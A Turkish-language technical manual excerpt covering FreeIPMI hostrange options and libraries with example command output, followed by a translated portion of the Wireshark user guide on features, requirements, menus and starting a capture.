whatsup ve libnodeupdown kitaplığı ile belirlenen Düğümlerden devre
dışı kalanları pdsh parametrelerinden -v ile işlem dışına alabiliriz
(bakınız http://whatsup.sourceforge.net).
>whatsup
up: 7: wopr[0-5], wopri
down: 1: wopr6
Bu işlemden sonra -v ile çalıştırılan pdsh wopr6 düğümünü otomatik
olarak devre dışına alır.
> time pdsh -v -w “wopr[0-6]” hostname
wopr1: wopr1
wopr0: wopr0
wopr2: wopr2
wopr5: wopr5
wopr4: wopr4
wopr3: wopr3
real
user
sys
0m0.034s
0m0.005s
0m0.012s
Bu örnekte zaman değişimi çok farklı olmayabilir. Ama bir kümede yer
alan devre dışı düğümler çoksa, zaman farkını gözlemlemek kolay olur.
FreeIPMI'de Sunucu Aralığı (Hostrange) Giriş/Çıkışı
Sunucu aralığı giriş/çıkışının çoğu FreeIPMI araçlarından pdsh
kullanılarak ele alınır. Ama pdsh karşı tarafta da bir kabuk programın
çalışmasını gerekli kılar. Bu işlem kümedeki çalışan işlerin CPU'larını
durdurabilir ve IPMI'in LAN üzerindeki CPU'yu kesememe yararını
ortadan kaldırır.
Sunucu Aralığı (hostrange) desteği bir çok FreeIPMI araçlarına
eklenmiştir. Birden çok düğüm komut satırından pdsh sunucu aralığı
kalıbına uygun bir biçimde belirtilebilir. Thread sayısı “fanout” -F
seçeneği ile arttırılır ya da eksiltilir.
Araçların pdsh ile aynı işlevsellikleri vardır. Ama IPMI iletişiminin tümü
bant dışında yapılır. Ipmipower sunucu aralığını 0.1.0 sürümünden beri
desteklemektedir. Başka araçlarla uyumlu olması için çıktıları ve
seçenekleri değiştirilmiştir.
Test kümesinde, “pwopr” sunucu adları “wopr” yerine “hostnames”
biçiminde kullanılmıştır. Bizim aynı zamanda kendi kullanıcı adımızı
(username) ve şifreyi XXXed out olarak kullanırız.

Örneğin:
> ipmi-sensors -h "pwopr[0-5]" -u XXX -p YYY --record-ids=10
pwopr0: 10 | CPU3 Vcore | Voltage | 1.31 | V | 'OK'
pwopr5: 10 | CPU3 Vcore | Voltage | 1.25 | V | 'OK'
pwopr1: 10 | CPU3 Vcore | Voltage | 1.23 | V | 'OK'
pwopr3: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
pwopr2: 10 | CPU3 Vcore | Voltage | 1.32 | V | 'OK'
pwopr4: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
dshback işlevselliği -B (tamponlaşmış= ve -c (birleştirilmiş)
seçenekleriyle kullanılır.
> bmc-info -h "pwopr[0-5]" -u XXX -p YYY --get-device-id -B
----------------
pwopr5
----------------
Device ID : 34
Device Revision : 1
Device SDRs
: unsupported (desteklenmez)
Firmware Revision : 1.0c
Device Available : yes (normal operation)
IPMI Version : 2.0
Sensor Device
: supported (desteklenir)
SDR Repository Device : supported (desteklenir)
SEL Device
: supported (desteklenir)
FRU Inventory Device : supported (desteklenir)
IPMB Event Receiver : unsupported (desteklenmez)
IPMB Event Generator : unsupported (desteklenmez)
Bridge
: unsupported (desteklenmez)
Chassis Device : supported (desteklenir)
Manufacturer ID : Peppercon AG (10437)
Product ID : 4
Auxiliary Firmware Revision Information : 38420000h
> bmc-info -h "pwopr[0-5]" -u XXX -p YYY --get-device-id -C
----------------
pwopr[0-1,5]
----------------
Device ID : 34
Device Revision : 1
Device SDRs
: unsupported
Firmware Revision : 1.0c
Device Available : yes (normal operation)
IPMI Version : 2.0
Sensor Device
: supported
SDR Repository Device : supported
SEL Device
: supported
FRU Inventory Device : supported
IPMB Event Receiver : unsupported
IPMB Event Generator : unsupported
Bridge
: unsupported
Chassis Device : supported
Manufacturer ID : Peppercon AG (10437)
Product ID : 4

Auxiliary Firmware Revision Information : 38420000h
Eğer sisteminize pdsh kurmuşsanız, o zaman -B ve -C seçenekleri
yerine dshbak kullanabilirsiniz. Bir çok kullanıcı pdsh kurmadığı için -B
ve -C seçenekleri vardır.
Whatsup benzeri araçlar ve kitaplıklar ipmidetect adıyla geliştirilmiştir.
Aynı whatsup işlevleriyle çalışır. Ama IPMI düğümü var mı diye bakar.
Böylece daha hızlı hostrange çıktısı alınır. Bu araç ipmidetectd arka
plan programının ayarlanıp çalışır durumda olmasını bekler.
İpmidetectd normalde ipmiping ile uzaktaki sunucuları tarar.
İpmidetect aracı ve kitaplığı belirlenen ve belirlenemeyen ipmi
sistemlerini inceler.
> /usr/sbin/ipmidetect
detected: 6: pwopr[0-5]
undetected: 1: pwopr6
örneğin, çalışmayan 'pwopr6' süğmesini hostrange içine alalım:
> time ipmi-sensors -h "pwopr[0-6]" -u XXX -p YYY --record-ids=10
pwopr5: 10 | CPU3 Vcore | Voltage | 1.25 | V | 'OK'
pwopr4: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
pwopr0: 10 | CPU3 Vcore | Voltage | 1.31 | V | 'OK'
pwopr3: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
pwopr2: 10 | CPU3 Vcore | Voltage | 1.32 | V | 'OK'
pwopr1: 10 | CPU3 Vcore | Voltage | 1.23 | V | 'OK'
pwopr6: ipmi_ctx_open_outofband(): Connection timed out
real 0m25.000s
user 0m0.029s
sys 0m0.003s
-E seçeneğiyle çalışan (ve ipmidetectd ayarlanmış ve çalışan) bir
ortamda -E seçeneği çalışmayan pwopr6 düğümünü atlar.
> time ipmi-sensors -h "pwopr[0-6]" -u XXX -p YYY --record-ids=10 -E
pwopr0: 10 | CPU3 Vcore | Voltage | 1.31 | V | 'OK'
pwopr2: 10 | CPU3 Vcore | Voltage | 1.32 | V | 'OK'
pwopr1: 10 | CPU3 Vcore | Voltage | 1.23 | V | 'OK'
pwopr4: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
pwopr5: 10 | CPU3 Vcore | Voltage | 1.25 | V | 'OK'
pwopr3: 10 | CPU3 Vcore | Voltage | 1.26 | V | 'OK'
real
user
sys
0m0.113s
0m0.030s
0m0.003s
Bunun komutun çalışması ve bitişindeki zaman kaybını izlemekte yarar
vardır.

FreeIPMI'da öngörülen sunucu aralığı (hostrange)
pdsh'den farklı olarak, rastgele bir kabuk komutu çalıştırabilirsiniz. Her
FreeIPMI aracı göreceli değişmez çıktısı vardır ya da çalıştırabileceğiniz
çıktı kümeleri vardır.
Çalıştırılan özeliklere ya da komutların çıktılarına dayanarak, sunucu
aralığı giriş/çıkışı farklı kullanılacaktır. Aşağıdakiler bazı önerilerdir.
Bunlar en sık kullanılan sunucu aralığı giriş/çıkışlarıdır.
İpmi-sensors:
Kümedeki her düğümün biraz farklı ısıları vardır. Bu nedenle
ipmi-sensors programını -q seçeneğiyle çalıştırarak çıktıları
özetlemek isteyebilirsiniz.
> ipmi-sensors -h "pwopr[0-6]" -u XXX -p YYY -g temperature -E -C
-q
----------------
pwopr[0-2,4-5]
----------------
4 | CPU1 Temp | Temperature | 'OK'
5 | CPU2 Temp | Temperature | 'OK'
6 | CPU3 Temp | Temperature | 'OK'
7 | CPU4 Temp | Temperature | 'OK'
8 | Sys Temp | Temperature | 'OK'
----------------
pwopr3
----------------
4 | CPU1 Temp | Temperature | 'OK'
5 | CPU2 Temp | Temperature | 'OK'
6 | CPU3 Temp | Temperature | 'OK'
7 | CPU4 Temp | Temperature | 'OK'
8 | Sys Temp | Temperature | 'At or Below (

İpmi-sel:
Her düğümün değişik ipmi-sel çıktısı olacaktır ve bunun boyutları
da çoktur. Bu nedenle tamponlanmış ya da kısaltılmış özlü çıktı
pek kullanışlı olmayabilir. Sunucu aralığı girişi SEl çıktılarını
toplamak için en kullanışlı olanıdır. Tüm kümedeki
sunucular/düğümler hakkında hızlı ve bant dışı bilgi alınabilir.
Bazı hatalar için “grep” kullanılabilir. Ya da log izleme
programına “pipe” (boru) ile aktarılabilir.
Sunucu aralığı işlevi SEL Loglarını hızla temizlemek için çok
kullanışlıdır.
“--no-header-output” seçeneği bir çok düğümde çıktıyı azaltmak
için kullanılabilir. “--sdr-cache-recreate” seçeneği hataları
güzelce ele almak için kullanışlı olabilir.
Kullanıcılar “--output-event-state” seçeneğini ipmi-sel ile
kullanmak isteyebilirler. Böylece o anki sensör durumlarını da
görebilirler. Bu seçenek NORMAL, UYARI ve KRITİK durumları
gösterir.
Bmc-info:
Sunucu aralığı kullanılırken, büyük bir olasılıkla kümenizdeki
BMC'nin firmware ya da donanım tipini doğrulamak istersiniz.
Büyük bir olasılıkla bmc-info programını özet çıktı için -C
seçeneğiyle çalıştırmak istersiniz. Sistem GUID'leri sistemler
arasında da farklıdır. Bu nedenle değişik çıktıları sınırlandırmak
için “--get-device-id” seçeneğiyle çalıştırmak istersiniz.
İpmi-raw:
ipmi-raw çıktısı en çok bir satır olabilir. Özlü çıktı ise en çok
istenen ve kullanılan biçimidir.
bmc-config/ipmi-chassis-config/ipmi-pef-config/ipmi-sensors-config:
Bu ayar araçlarınıntipik kullanımı “--checkout” seçeneği ile
çalıştırarak ayarları denemiş olur. Ayar değişikliklerini dosyaya
yazmak için “--commit” seçeneği ile çalıştırılır. Öyle sanılır ki bir
çok kullanıcı bunu yalnız sunucu aralığı desteğiyle ve “--commit”
seçeneğiyle kullanarak birden çok sunucuyu aynı anda ayarlamış
olur. Bant-dışı bağlantıdan önce bant içi ayar dosyası işlemleri
çok olacaktır (IP ve MAC adreslerinin ayarlanması gibi). Bir çoğu
sunucuyu bant dışına alıp ayar bile yapmak istemeyecektir. “--
diff” seçeneği birçok makine arasında kullanılabilir. Bu makineler
arasında ayar değişikliği olup olmadığı izlenmiş olur.
FreeIPMI içinde sunucu aralığı desteği ayrıcalıkları

Ek Notlar
Bazı koşullarda sunucu aralığı giriş/çıkışı desteklenmez.
- Bir kümedeki her BMC değişik IP ve MAC adresiyle ayarlanır. Bu
durumda paralel çalışma yapılamaz.
- Ipmi-power bmc-info'dan değişik bir mimari ile yazılmıştır. Amacı
Powerman ile iletişimde olmak olduğundan paralele işlemlerde
kullanılamaz.
[1] Neden FreeIPMI doğrudan “whatsup” kullanmaz? Whatsup işletim
sistemi “up” ve sağlıklı çalışıyor demektir. IPMI işletim sistemi
çalışmadan da işlem yapabilir. Hatta düğüm “power off” olsa bile. Bu
nedenle alternatif bir ürün gerekmiştir.
FreeIPMI Kitaplıkları
Albert Chu
chu11@llnl
FreeIPMI ile kullanılabilecek kitaplıklar ve program arayüzleri (API) aşağıda
kısaca anlatılmıştır.
Libfreeipmi
Libfreeipmi ilkcil bir kitaplıktır. Bir çok Freeipmi aracı bu kitaplığa
dayanır. Aşağıdakiler kitaplığın alt bölümlerini oluşturur.
Api
Libfreeipmi tarafından sağlanan en yüksek düzey arayüzdür
(API). Kullanıcıdan bant içi ve bant dışı protokollerin ayrıntılarını
soyutlar. Kullanıcıya kullanışlı hata kodları sağlar. Bu hata kodları
IPMI işlemlerini anlamaya ve yorumlamaya yarar. Pek çok
FreeIPMI aracı ve kitaplığı tarafından “api” kullanılır. Örneğin
bmc-info, ipmi-sensors ve libipmimonitoring...
cmds
fiid şablonları ve “fill” işlevleri için IPMI komutlarıdır. IPMI
komutlarının ortak parametreleri için tanımlanan makroları da
sağlar. Libfreeipmi'nin diğer parçalarının çoğunda “cmds”
kullanılır. İpmipower ve ipmiconsole gibi araçlarca da kullanılır.
Debug
paket/kayıt dump (dökmek) için gereken işlevleri sağlar. Daha
çok “api” alt bölümü tarafından kullanılır. İpmipower ve
ipmiconsole bunları kullanan araçlardır.

Driver
IPMI iletişimi için gereken arayüzleri (API) sağlar. Şu anda
desteklenen sürücüler KCS, SSIF, OpenIPMI ve sunbmc'dir. Bmcwatchdog
gibi araçlar tarafından kullanılır.
Fiid
FreeIPMI arayüz tanımı libfreeipmi'de bulunan paketleri
hazırlanması ve açılması işlerinde kullanılan arayüzler sağlar.
Arayüz (API) fiid şablonlarını kullanır. Bunlar da fiid-object
(nesne) yaratmakta kullanılır. Fiid-şablonları paketleri dizi
adından tanımlar ve alanların bit haritası vardır. Arayüz
kullanıcıların alanları okuma/yazma işlemlerini alan bitleriyle
çözümler. Marshalling, paketleme, endian ve diğer ağ işlemleri
“fiid” ile ele alınır. Fiid nesneleri libfreeipmi içinde ele alınır. “api”
alt bölümü “cmds” alt bölümü ve diğer araçlar.
Fru-parse
Alan değiştirilebilen birim (field replacable unit FRU) için tarama
arayüzü sağlar. İpmi-fru gibi araçlar tarafından kullanılır.
İnterface
bant içi ve bant dışı protokolleri için 'assemble' (monte etmek)
ve 'disassemble' (demonte etmek) işlevlerini sağlar. Aynı
zamanda tüm fiid şablonlarını sağlar. “fill” işlevleri ve diğer hazır
işlemler IPMI iletişimi için gerekenlerin arayüzlerini sağlar. “api”
alt bölüm tarafından kullanılır. İpmipower ve ipmiconsole
araçlarınca da kullanılır.
İnterpret
sensor olaylarını Nominal, Uyarı ve Kritik konumlarına bölüp
yorumlayan arayüzleri sağlar. FreeIPMI araçlarınca kullanılır.
İpmi-sensors ve libipmimonitoring kullanan araçlarıdır.
Locate
Bant içi IPMI iletişimi için varsayılan değerleri bulmak için bir kaç
standart sorgulama arayüzü sağlar. “api” alt bölümünü kullanır.
İpmi-locate aracı tarafından kullanılır.
Payload
makrolar, fiid-şablonlar ve IPMI içinde kullanılan payload ların
bilgilerini sağlar. İpmiconsole tarafından LAN üzerinden seri
bağlantı biçiminde kullanılır.
Record-format
IPMI içinde kullanılan makrolar, fiid-şablonları ve kayıtlar üzerine
bilgi sağlar. “sdr-cache” alt bölümünde kullanılır ve ipmi-sensors
aracını kullanır.

Sdr-cache
sensor veri deposundakileri yaratmak, kaşelemek, okumak ve
taramak işlerini sağlar. İpmi-fru ve ipmi-sensors araçları
tarafından kullanılır.
Sdr-parse
SDR kayıtlarını taramak için arayüz sağlar. İpmi-fru ve ipmisensors
tarafından kullanılır.
Sel-parse
Sistem Olay Log'larını okuyup tarayacak arayüzü sağlar. İpmi-sel
tarafından kullanılır.
Sensor-read
Sensorleri okumak için bir arayüz sağlar. İpmi-sensors tarafından
kullanılır.
Spec
Util
IPMI içindeki diğer tanımlar için makrolar ve diziler sağlar. İpmisensors
tarafından kullanılır.
anahtarlar, sensor okumaları gibi hazır işlevleri sağlar. FreeIPMI
tarafından kullanılır.
Libipmiconsole
Yüksek düzeyde LAN üzerinden seri işlemler uyarlamasıdır.
Uzaktan konsol erişimi sağlar. Birden çok IPMI 2.0 oturumu
açılmasını sağlar. IPMI/SOL (Serial Over LAN) ilişkisini basit bir
dosya tanımına indirgemiştir.
Libipmimonitoring
Yüksek düzel SEL ve sensor izleme arayüzü sağlar. Kulalnıcının
sensor değerleri, gruplar, birimler ve durumlar konusunda
tekrarlayan işlem yapması için arayüz sunar.
Libipmidetect
Bir küme içinde hangi düğümün IPMI destekleyip
desteklemediğini belirleyen yüksek düzey arayüz sağlar. Bu
kitaplık düğümlerin bakım için bir kümeden çıkarılmasını da
algılar. Böylece IPMI gereksiz zaman aşımı beklemeleri yapmaz.
Kitaplık ipmidetecd ile iletişimde çalışır.

Pkg-config desteği
Tüm yukarıdaki kitaplıklar için FreeIPMI pkg-config desteği sunar.
PKG_CHECK_MODULES(FREEIPMI, libfreeipmi,
HAVE_LIBFREEIPMI="yes", HAVE_LIBFREEIPMI="no")
Ya da doğrudan pkg-config çağrılır:
CFLAGS += $(shell pkg_config –-cflag libfreeipmi)
LIBS += $(shell pkg_config –-libs libfreeipmi)
Daha geniş bilgi için:
http://www.freedesktop.org/wiki/Software/pkg-config

Ek-6
Wireshark
Kullanıcı El Kitabı
(User manual)
Wireshark Nedir
Wireshark ağ paket analiz programıdır. Ağ paket analiz programı ağ
paketlerini saklar ve en ayrıntılı paket verileri görüntüsü sağlamaya çalışır.
Ağ analiz programı ağda neler olduğunu ayrıntılarıyla anlatmaya çalışır.
Eskiden bu araçlar ya çok pahalı ya da topluma açık değildi.
Wireshark bu konuda açık kaynak kod olarak en kullanışlı olanlarından biridir.
Bazı maksatlı amaçları
Kullanıcıar wireshark aşağıdaki nedenlerden kullanıyorlar:
. Ağ yöneticiler ağdaki sorunları bulmak için kullanrlar.
. Ağ güvenliği güvenlik sorunları için kullanır
. Program geliştiriciler protokol hatalarını gidermek için kullanırlar.
. İnsanlar ağ protokol aralıklarını anlamak için kullanır/izlerler.
Özellikleri
Hem UNIX hem de Windows altında kullanılabilir.
Ağ arayüzünden canlı paketleri yakalayabilir.
Tcpdump/windump ve Wireshark programlarından yakalanan veriler
dosyalarda saklanabilir.
Paket verilerinin onaltılı dump'larından paket bilgilerini dıştan alır
(import).
Çok ayrıntılı protokol bilgileriyle paketleri görüntüle.
Yakalanan paket verilerini sakla.
Yakalanan paketleri bir çok dosya kalıplarına göre dışa ver.
Bir çok kritere göre paketleri filitrele.
Bir çok kritere göre paketleri ara.
Filitrelere göre görüntülenen paketleri renklendir.

Çeşitli istatistikler yarat.
Birçok ağ ortamından canlı veri yakalama
Wireshark ağ ortamlarının pek çoğundan tarif verilerini yakalayabilir.
Buna kablosuz ağ bağlantıları da dahildir. Desteklene ağ iletişim
ortamları hakkında ayrıntılı bilgi
http://wiki.wireshark.org/CaptureSetup/NetworkMedia adresinden
sağlanır.
Başka programların yakaladığı verileri dıştan al.t
Başka programların yakaladığı verileri wireshark dıştan alabilir. Ayrıntılı
bilgiler için:
http://www.wireshark.org/docs/wsug_html_chunked/ChIOOpenSection.
html#ChIOInputFormatsSection
adresine bakabilirsiniz.
Başka programlara yakalanan verileri dışa verir.
Başka programlara yakaladığı verileri aktarabilir. Bu programların
ayrıntılı listesi için “Çıktı Dosyaları kalıpları” hakkında ayrıntılı bilgi
alınabilir
http://www.wireshark.org/docs/wsug_html_chunked/ChIOSaveSection.html#ChIOOutp
utFormatsSection.
Birçok protokol çözümleyici
Protokol çözümleyiciler vardır. Bunların listesi için
http://www.wireshark.org/docs/wsug_html_chunked/AppProtocols.html adresine
bakabilirsiniz..
Açık Kaynak Yazılım
Wireshark açık kaynaktır. GPL lisansıyla dağıtılır. Serbestçe
kullanılabilir.
Wireshark ne değildir
Sızmaları yakalayan bir sistem değildir. Biri tuhaf şeyler yaparsa sizi
uyaramaz. Ama tuhaf şeyler oluyorsa size ne olduğunu söyleyebilir.
Ağ üzerindekileri değiştiremez. Yalnız ağ üzerindekileri ölçebilir.

Sistem Gereksinimi
Wireshark çalışır olması için nelere gerek vardır?
Genel Konular
Aşağıdaki değerler en az gerekenlerdir.
Yoğun bir ağ trafiğinde yüksek disk ve bellek kapasitesi gerektirir.
Örneğin 100MBits/san Ethernet yaklaşık 750MBayt/dak. bilgi üretir. BU
nedenle hız bir işlemci, yüksek bellek ve disk kapasitesi iyi bir
başlangıçtır.
Eğer Wireshark için bellek yetmezse kırılır
http://wiki.wireshark.org/KnownBugs/OutOfMemory ve çalışması durur.
Çok işlemcili ve çoklu thread işletim sistemleri Wireshark için çok
önemli ve avantajlı değildir. Çünkü paket filitreleme işlemi tek thread
ile çalışır. Ama kural paket listelerinin gerçek zamanlı işlenmesidir.
Genelde yakalama işlemleri bir işlem zamanında yürütülürken
görüntüleme başka bir işlemle yürütülür. Yani iki işlemcili bir sistem
Wireshark için yeterlidir.
Micrsoft Windows
Windows XP Home, XP Pro, XP Tablet PC, XP Media Center, Server
2003, Vista 2008, 7 ya da 2008 R2
Modern 32-bit x86 ya da 64-bit AMD64/x86-64 işlemcilerler herhangi
biri
128MB kullanılabilir bellek. Daha büyk yakalama dosyaları için daha
çok bellek gerekebilir.
75MB kullanılabilir disk kapasitesi. Yakalanan dosyalar için ek alan
gerekebilir.
800x600 (1280x1034 ya da daha yüksek) çözünürlük ve 16 bit renk
seçeneği Wireshark için yeterlidir (Eski GTK1 ve 1.0.x sürümler
kullanılmışsa).
Yakalamak için desteklenen ağ kartı.
Windows'un desteklediği ethernet kartı çalışır.
802.11 ham verilerini ek bir donanım olmadan yakalamak zor
olabilir. Wireshark wiki sayfasına bakın
http://wiki.wireshark.org/CaptureSetup/WLAN#head-
02456742c655394c9e948a4c9a59d3441c92782f
Diğer ortamlar
http://wiki.wireshark.org/CaptureSetup/NetworkMedia adresinde
vardır.

Görüşler
Bir çok eski Windows sürümleri artık desteklenmemektedir. Bu
sistemleri artık geliştiriciler kullanmamaktadır. Wireshark WinPcap,
GTK kitaplıklarına dayanır ve bu kitaplıkların eski sürüm destekleri
yoktur.
Windows 95, 98 ve ME artık desteklenmemektedir. Eski Windows
sürümlerinde bellek koruması yoktur. Halbuki bu program güvenliği
için kullanılıyordur.
Wireshark Windows NT 4.0 ile de çalışmaz.
Windows 2000 Wireshark ile çalışmaz.
Windows CE ve adlandırılmayan diğer sürümlerde Wireshark çalışmaz..
Çoklu monitör desteği vardır ama biraz tuhaf çalışmaktadır.
Unix/Linux
Wireshark şu anda bir çok Unix ortamında çalışmaktadır. Sistem
gereksinimi yukarıdaki Windows kapasileri düzeyindedir.
İkili program paketleri:
Apple Mac OS/X
Debian GNU/Linux
FreeBSD
Gentoo Linux
HP-UX
Mandriva Linux
NetBSD
OpenPKG
Red Hat Enterprise/Fedora Linux
rPath Linux
Sun Solaris/i386
Sun Solaris/Sparc
Canonical Ubuntu
Eğer sistem için ikili paket yoksa kaynak kodlar indirilip kurabilirsiniz.
Wireshark nereden sağlanır
Son kopyayı http://www.wireshark.org/download.html adresinden
sağlayabilirsiniz.

Her dört ya da sekiz ayda yeni bir kopya üretilmektedir.
KULLANICI ARAYÜZÜ
GİRİŞ
Şimdiye dek Wireshark kurulmuş ve veri yakalama hazır durumdadır.
Burada Wireshark kullanıcı arayüzü nasıl çalışır
Wireshark paketleri nasıl yakalar
Paketler nasıl görüntülenir.
Wireshark paketleri nasıl filitreler
Ve birçok ufak tefek diğer işlemer
Wireshark Başlatma
Wireshark kabuk programdan ya da window yönetiminden başlatılır.
Wireshark komut satırından başlatılırken seçenekleri belirtmek olanağı
vardır.
İlerideki bölümlerde bir çok ekran görüntüsü yer alabilir. Bir çok
değişik ortamda çalıştığından burada görüntülenen resimler sizinkilere
benzemeyebilir. Ama işlevsel açıdan bir fark yoktur.
Ana Pencere

Wireshark ana penceresi diğer programlardan da bilinen bazı ortak
alanlar bulundurur. Bunlar:
Menü
Ana araç çubuğu
Ana menüden sık kullanılan seçeneklere kolay erişim için
kullanılır.
Filitre Araç Çubuğu
Görüntüleme filitrelerine doğrudan erişmek ve değiştirmek
için kullanılır.
Paket Liste panosu
Yakalanan her paketin özetini görüntüler. İlgili satıra
tıklanarak diğer iki panoda nelerin görüntüleneceğine
karar verirsiniz.
Paket Ayrıntı Panosu
Seçilen paketin ayrıntılı bilgisini görüntüler.
Paket Bayt Panosu
Paket Liste panosundan seçilen paketin paket ayrıntıları
panosundaki seçilen alanının baytlarını gösterir.

Durum Satırı
O anki program durumu hakkında kısa ama ayrıntılı bilgi
verir.
Özellikler seçeneği ile ana pencerede görüntülenenleri değiştirme
olanağı vardır.
Ana Pencerede Dolaşım
Paket listesi ve ayrıntılı dolaşım tümüyle tuş takımından yapılabilir.
Aşağıda tuş takımından kullanılabilecek komutlar ve anlamları yer
almaktadır.
Tab, Shift+Tab
Aşağı Ok
Yukarı Ok
Ekrandaki ögeler arasında dolaşımı belirtir. Tab ileriye gidiş
Shft+Tab geri gidişler içindir.
Bir sonraki pakete ya da ayrıntı alanına gidiş demektir.
Bir önceki pakete ya da ayrıntı ögesine geçiş demektir.
Ctrl+Aşağı OK, F8
Paket listesi önde değilse bile bir sonraki pakete geçmek için
kullanılır.
Ctrl+Yukarı Ok, F7
Ctrl+.
Ctrl+,
Sol Ok
Sağ Ok
Paket listesinde önceki pakete geçmek için kullanılır.
Görüşmenin (TCP, UDP, IP) bir sonraki paketine geçişi sağlar.
Görüşmenin (TCP, UDP, IP) bir önceki paketine geçişi sağlar.
Paket ayrıntılarında seçilen ağaç ögesini kapatır. Eğer kapalıysa
baba rolündeki düğüme zıplar.
Paket ayrıntılarında seçilen ağaç ögesini açar.
Shift+Sağ Ok
Paket ayrıntılarında seçilen ağaç ögesini açar ve onun tüm alt
ağaçlarını da açar.

Ctrl+Sağ Ok
Paket Ayrıntılarında ağaç ayrıntılarının tümünü açar.
Ctrl+Sol Ok
Paket Ayrıntılarında tüm ağaç ayrıntılarını kapatır.
Backspace
Paket Ayrıntılarında bir üsteki düğüme atlar.
Return, Enter
Paket Ayrıntılarında seçilen ağaç ögesini tetikler.
Ek olarak ana menünün herhangi bir yerinden tuşlara basılınca
görüntü filitresi alanına bilgi girmeye başlanmış olunur.
Ana Menü
Wireshark Menü, Wireshark penceresinde bulunur. Örnek menü
aşağıda gösterilmiştir:
Eğer menü seçeneğindeki özellik o kurulumda kullanılabilir durumda
değilse grileştirilir. Örneğin daha önce bir veri yakalamamışsanız
Saklama yapamazsınız.
Menüde bulunan seçenekler şunlardır:
File (Dosya)
Bu seçenek yakalanan verileri açma (open), birleştirme (merge),
saklama (save) / yazdırma (print) / idışa verme (export) tümü ya
da bir parçası için yapacak işlemlerden oluşur. Wireshark
işlemini bitirme (quit, exit) bu seçenekler arasındadır.

Edit (Düzenleme)
Bu seçenek bir paketi bulma, zaman referansini ya da bir ya da
daha çok paketi işaretlemeyi, ayar profillerini ele almayı gibi alt
seçenekleri belirtir. Ayrıca sizin kullanımınıza özel ayar
seçenekleri (özellikler) de burada ele alınır.

View (Göster)
Bir paketi bulmaya yarayacak ögelerden oluşur. Paketlerin
renklendirilmesi, yakınlaştırma, uzaklaştırma, paketleri ayrı bir
pencerede gösterme paket ayrıntılarında ağaçları açıp kapama
burada yer alan seçeneklerdir.

Go (Git)
Bu menü özel bir pakete gidecek ögeden oluşur.

Capture (Yakala)

Bu menü yakalamayı başlatma ve durdurma işlemini yapmanızı
sağlar.

Analyze (Analiz/İnceleme)
Bu menü seçeneğinde görüntü filitrelerini değiştirme, açma,
kapama, protokolların parçalara ayrılması, kullanıcının
tanımladığı kod açma yöntemleri ve TCP akışını izleme bulunan
alt ögelerdir.

Statistics (İstatistikler)
Bu seçenekte yer alan ögeler çeşitli istatistik pencereleri
açılmasını (yakalanan paketlerin özeti dahil olmak üzere),
protokol sıradüzeni (hierarchy) istatistiklerini ve bir çok diğer
şeylerin sayısal incelemelerini içerir.

Telephony (Telefon)
Bu menü telefona dayalı istatistik verileri görüntülemekte
kullanılır. Ortam analizleri, akış çizelgeleri, protokol sıradüzen
istatistikleri ve bir çoğu burada yer alır.

Tools (Araçlar)
Wireshark'a bulunan bir çok aracı içerir.

Internals (Dahili)
Wireshark'ın dahili bilgilerini açıklayan ögeleri içerir.

Help (Yardım)
BU menü ögeleri kullanıcıya yardım sağlamak içindir. Bazı temel
yardım bilgilerine erişim, el kitabı bilgilerine erişim ve çeşitli
komut satırı araçların kullanımı, web sayfalarına erişim ve
Hakkımızda sayfası burada yer alır.

Bu menü ögeleri izlenen menü seçeneği alt menülerinde de anlatılır.
Menü ögelerine hızlandırıcı anahtar tuş bilgileri (accelerator keys) ile
de doğrudan erişilebilir.
Canlı Ağ Verisini Yakalama
GİRİŞ
Canlı ağ verisini yakalama Wireshark'ın en önemli işlevlerinden biridir.
Wireshark yakalama makinesi aşağıdaki özellikleri sağlar:
Değişik ağ donanımlarından veri toplayabilir (Ethernet, Token
Ring, ATM gibi)
Değişik tetikleme koşullarına göre yakalamayı durdurabilir.

Yakalanan verinin miktarı, yakalama zamanı, yakalanan paket
sayısı.
Yakalama devam ederken aynı anda paketleri gösterebilme.
Yakalama devam ederken gösterilen paketlerin açılması.
Yakalanacak veri miktarını paketleri filitreleyerek azaltmak.
Uzun dönem yakalama yaparken yakalananları bir çok dosyaya
dağıtarak saklamak.
Aynı anda birden çok ağ arayüzünden veri yakalamak.
Ama yakalama makinesi tüm bunlara rağmen aşağıdakilerden
yoksundur:
Ön Koşullar
Yakalanan veri içindeki bir koşula göre yakalamayı durdurmak.
İlk kez veri yakalamak için ayar yapmak biraz hilelidir. Aşağıda bazı
tuzaklardan söz edilmiştir.
Canlı yakalama yapmak için root/Administrator yetkiniz olmalıdır.
Paket verilerini yakalayacağınız doğru arayüzü seçmelisiniz.
Görmek istediğiniz trafiği görmek için doğru yeri seçmelisiniz.
Yakalamada sorun olursa araylara bakmanız gerekir.
Yakalamayı Başlatma
Aşağıdaki yöntemlerden biri kullanılarak yakalama başlatılabilir.
Yerel arayüzü hakkında bilgi edinmek için önce “Capture
Interface” (Yakalam Arayüzü) penceresini kullanmak gerekir.
Yakalama bu penceredeki yakalama düğmelerinden birini
kullanarak başlayabilirsiniz.

Yakalamaya “Capture Options” (Yakalama Seçenekleri)
penceresiyle başlayabilirsiniz.
Eğer seçenekleri doğru doldurmuşsanız hemen yakalama
işlemine başlayabilirsiniz. “Yakalama Başlatma” menüsü araç
çubuğundaki ögeyi kullanarak yakalama başlar.
Eğer yakalama arayüzünün adını zaten biliyorsanız Wireshark'ı
komut satırından “wireshark -i eth0 -k” yazarak da

aşlatabilirsiniz.
Yakalama Arayüzü Penceresi
Yakalama menüsünden Arayüzler seçilince Wireshark “Capture
Interface” (Yakalama arayüzü) penceresini açar. Burada bir çok sistem
kaynağı kullanıldığından hemen kapatmakta yarar vardır. Burada
yalnız wireshark tarafından bilinen yerel arayüzler gösterilir. Gizli
arayüzler gösterilmez. Aynı anda birden çok arayüzden bilgi
yakalamak söz konusu olduğundan “toggle” düğmesi bir ya da daha
çok arayüz seçmek için kullanılabilir.
Device Cihaz (Unix/Linux)
Arayüz cihaz adı
Description (açıklama)
IP
Cihaz açıklaması
Bu arayüz için programın bulacağı ilk IP numarası. Ethernet'e
bağlı adresler arasında dönerek arama da yapılabilir.
Packets (Paketler)
Packets/s
Stop
Start
Bu arayüzden yakalanacak paket sayısı.
Son saniyede yakalanan paket sayısı
Yakalamayı durdur.
Yakalamayı başlat
Seçenekler Penceresi
Options (Seçenekler)
